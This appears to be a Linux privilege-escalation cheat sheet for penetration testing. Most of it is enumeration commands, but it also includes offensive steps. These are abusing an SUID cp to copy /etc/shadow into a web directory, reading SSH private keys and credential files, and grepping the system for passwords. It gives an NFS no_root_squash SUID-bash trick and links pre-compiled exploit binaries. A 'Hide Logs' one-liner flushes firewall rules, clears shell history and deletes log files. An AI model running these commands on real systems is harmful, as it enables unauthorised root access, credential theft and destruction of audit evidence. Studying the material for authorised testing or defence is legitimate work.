Link to this headingLinux Enumeration for Privilege Escalation

Link to this headingPrinter

lpstat -a

Link to this headingOS Enumeration

Operating System Enumeration:

cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release uname -n // System hostname hostname // As above

Kernel version:

cat /proc/version uname -a uname -r // Kernel release uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- cat /proc/cpuinfo // CPU information

Link to this headingUser Information

Environmental Variables:

cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout set // As above echo $PATH history env

Users and Groups:

cat /etc/passwd cat /etc/group // List all groups on the system cat /etc/shadow // Show user hashes – Privileged command grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts finger // Users currently logged in pinky // As above users // As above who -a // As above w // Who is currently logged in and what they’re doing last // Listing of last logged on users lastlog // Information on when all users last logged in lastlog --user root // Information on when the specified user last logged in

User and Permission Information:

whoami id cat /etc/sudoers // Who’s allowed to do what as root – Privileged command sudo -l // Can the current user perform anything as root cat /etc/passwd | cut -d: # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers

What has the user being doing?
Is there any password in plain text? What have they been editing?

cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history

What user information can be found?

cat ~/.profile cat /var/mail/root cat /var/spool/mail/root

Link to this headingServices/Applications

Which service(s) are been running by root?
Of these services, which are vulnerable - it’s worth a double check!

ps aux | grep root ps -ef | grep root

What applications are installed?
What version are they? Are they currently running?

ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ dpkg -l rpm -qa sudo -V httpd -v apache2 -v apache2ctl (or apachectl) -M mysql --version perl -v java -version python --version ruby -v find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc) which %program_name% (i.e. nc, netcat, wget, nmap etc) As above

Check Service Settings
Are they misconfigured or have (vulnerable) plugins attached?

cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' ps aux | grep root // View services running as root cat /etc/inetd.conf // List services managed by inetd cat /etc/xinetd.conf // As above for xinetd

Link to this headingSSH information

Can private-key information be found?

ls -la ~/.ssh/ cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa ls -la /etc/ssh/ cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key

Link to this headingScheduled Tasks

crontab -l -u %username% ls -la /etc/cron* ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null ls -alh /var/spool/cron ls -al /etc/ | grep cron cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab ls -alh /etc/cron.daily ls -alh /etc/cron.weekly ls -alh /etc/cron.monthly cat /etc/anacrontab cat /var/spool/cron/crontabs/root

Link to this headingOther Configuration files

find /home –name .rhosts -print 2>/dev/null ls -ahlR /root/ ls -ahlR /home/ ls -la ~/.*_history ls -la /usr/sbin/in.* find /var/log -type f -exec ls -la {} ; 2>/dev/null find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null ls -la /etc/*.conf As above lsof -i -n ## List open files (output will depend on account privileges) lsof -u root ## lists all open files and processes by user root

Link to this headingPermissions

Which configuration files can be written in /etc/?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

World Writable and Executable directories:

find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders find / -perm -o+x -type d 2>/dev/null # world-executable folders find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders

Any “problem” files? Word-writeable, “nobody” files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files

Sticky bits, SUID & GUID

find / -perm -u=s -type f 2>/dev/null #Find FILES that have the sticky bit set. find / -perm -1000 -type d 2>/dev/null # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

We found cp (copy) in the above list and now we are abusing it:

cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt

Few things to keep in mind:

  1. At the destination, the file owner will be root but the group will be that of the current user and
  2. Notice the use of “–no-preserve” this is needed to read out protected files.
  3. A lot of ways we can abuse this, update the shadow file with a new account, modify sudoers, plant ssh key + modify sshd_config ## + reboot,or cron.hourly.

Link to this headingCredential Files

What sensitive files can be found?

cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/

What can be found in /var/ ?

ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website or within the database

ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/

Link to this headingGetting more information from a file

file ./somefile ## file info strings ./*.txt | grep password find / -name*.log” |xargs grep -i pass grep -l -i pass /var/log/*.log 2>/dev/null find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null # searches for the string 'password' and output the line number find / -maxdepth 10 -name *etc* -type f | grep -Hn pass; 2>/dev/null # as above, but in *etc* grep -l -i pass /var/log/*.log 2>/dev/null # Check log files for keywords (‘pass’ in this example) and show positive matches find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null #Find .conf files (recursive 4 levels) and output line number where the word password is located grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla hexeditor ./file objdump -D -M intel ./file objdump -D -M x86-64 ./file >> dump64.file cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg find / -name "network-secret.txt" locate "network-secret.txt"

Link to this headingFile Systems

df -ah # all FS info, including pseudo, duplicate, INACCESSIBLE file systems

Are there any unmounted file-systems?

cat /etc/fstab

Link to this headingNetworking

/sbin/ifconfig -a // List all network interfaces cat /etc/network/interfaces // As above cat /etc/sysconfig/network arp -a Display ARP communications route Display route information cat /etc/resolv.conf Show configured DNS sever addresses netstat -antp List all TCP sockets and related PIDs (-p Privileged command) netstat -anup List all UDP sockets and related PIDs (-p Privileged command) iptables -L List rules – Privileged command cat /etc/services View port numbers/services mappings

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname

What other users & hosts are communicating with the system?

lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w

Whats cached? IP and/or MAC addresses

arp -e route /sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21 tcpdump -n dst host 192.168.1.5 -vvv -n -w file.cap

More Info

Is tunneling possible? Send commands locally, remotely

ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig

Copy bash to a new subshell
mount a NFS share from a remote server, copy bash from local to remote and execute

cp -p ./bash /mnt/share/newbash ./newbash -p

Link to this headingWhat development tools/languages are installed/supported?

find / -name perl* find / -name python* find / -name gcc* find / -name cc

Link to this headingHide Logs

iptables -F; history -c; find ./ -name*.log” |xargs rm -f

Link to this headingLocal Privilege Escalation Pre-compiled binaries files. Use at your own risk

Bin1
Bin2

Linux Privilege Escalation using weak NFS permissions

if contains no_root_squash then

  1. cp /bin/bash /shared
  2. mount -t nfs server:/shared /mnt/
  3. chown root:root bash && chmod u+s bash